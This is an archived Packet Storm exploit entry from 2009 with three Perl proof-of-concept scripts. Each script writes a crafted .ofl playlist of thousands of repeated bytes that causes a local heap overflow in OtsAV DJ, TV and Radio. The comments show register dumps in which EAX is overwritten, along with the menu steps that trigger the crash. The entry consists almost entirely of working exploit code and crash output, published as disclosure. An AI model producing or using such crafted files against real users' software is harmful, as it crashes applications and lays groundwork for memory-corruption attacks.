OtsAV Heap Overflow Exploits

2009-07-10T00:00:00
ID PACKETSTORM:79084
Type packetstorm
Reporter Stack
Modified 2009-07-10T00:00:00

Description

                                        
                                            `----------------------------------the first Poc------------------------------------  
#!/usr/bin/perl  
# OtsAv DJ [.olf] Local Heap Overflow Poc  
# Down : http://serv-08.download.otszone.com/download.cgi/otsavdjtrialsetup.exe?A=13JTHRVWJLLLZ5JG2AYRNSMN%2DWJMQXDJKA%2DRFQ&otsavdjtrialsetup.exe  
# Desc : 7000 A' Heap overflow  
# By Mountassif Moad a.k.a Stack  
# v4 Team & evil finger  
# Open Stack.ofl >> File >> Import List >> As playlist >>  
# BOOOOOOOOOOOOOOOOOOOM  
# register of 7000 A'  
# EAX 41414141  
# ECX 00E5448C OtsAVDJt.00E5448C  
# EDX 41414141  
# EBX 00E54488 OtsAVDJt.00E54488  
# ESP 02C6FE1C  
# EBP 00E0D328 OtsAVDJt.00E0D328  
# ESI 00000000  
# EDI 0174C070 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
# EIP 0046266C OtsAVDJt.0046266C  
# register of 2000 A'  
# EAX 41414141  
# ECX 00001B05  
# EDX 02FAF730  
# EBX 0000042A  
# ESP 02FAF9C8  
# EBP 00000000  
# ESI 020FAFEA  
# EDI 02FAFEAA  
# EIP 0043C8D7 OtsAVDJt.0043C8D7  
use strict;  
use warnings;  
my $A= "\x41" x 7000;  
open(my $ofl_playlist, "> stack.ofl");  
print $ofl_playlist  
$A.  
"\r\n";  
close $ofl_playlist;  
-------------------------------Second Poc-----------------------------------------------------  
  
#!/usr/bin/perl  
# OtsAv TV [.olf] Local Heap Overflow Poc  
# Down : http://www.otsav.com/buy/tv/  
# Desc : 2000 A' Heap overflow  
# By Mountassif Moad a.k.a Stack  
# v4 Team & evil finger  
# Open Stack.ofl >> File >> Import List >> As playlist >>  
# BOOOOOOOOOOOOOOOOOOOM  
# EAX 45454545  
# ECX 00009AF0  
# EDX 03A0F730  
# EBX 0000042A  
# ESP 03A0F9C8  
# EBP 00000000  
# ESI 02CD7102  
# EDI 03A0FEAA  
# EIP 0043C8D7 OtsAVTVt.0043C8D7  
use strict;  
use warnings;  
my $A= "\x45" x 2000;  
open(my $ofl_playlist, "> stack.ofl");  
print $ofl_playlist  
$A.  
"\r\n";  
close $ofl_playlist;  
----------------------------------- 3 POC-------------------------------------------------  
#!/usr/bin/perl  
# OtsAv Radio [.olf] Local Heap Overflow Poc  
# Down : http://www.otsav.com/buy/radio/  
# Desc : 2000 A' Heap overflow  
# By Mountassif Moad a.k.a Stack  
# v4 Team & evil finger  
# Open Stack.ofl >> File >> Import List >> As playlist >>  
# BOOOOOOOOOOOOOOOOOOOM  
# EAX 45454545  
# ECX 0000CD32  
# EDX 0224F730  
# EBX 00000452  
# ESP 0224F9C8  
# EBP 00000000  
# ESI 00C8E0EA  
# EDI 0224FED2  
# EIP 0043B497 OtsAVRDt.0043B497  
use strict;  
use warnings;  
my $A= "\x45" x 2000;  
open(my $ofl_playlist, "> stack.ofl");  
print $ofl_playlist  
$A.  
"\r\n";  
close $ofl_playlist;  
  
  
`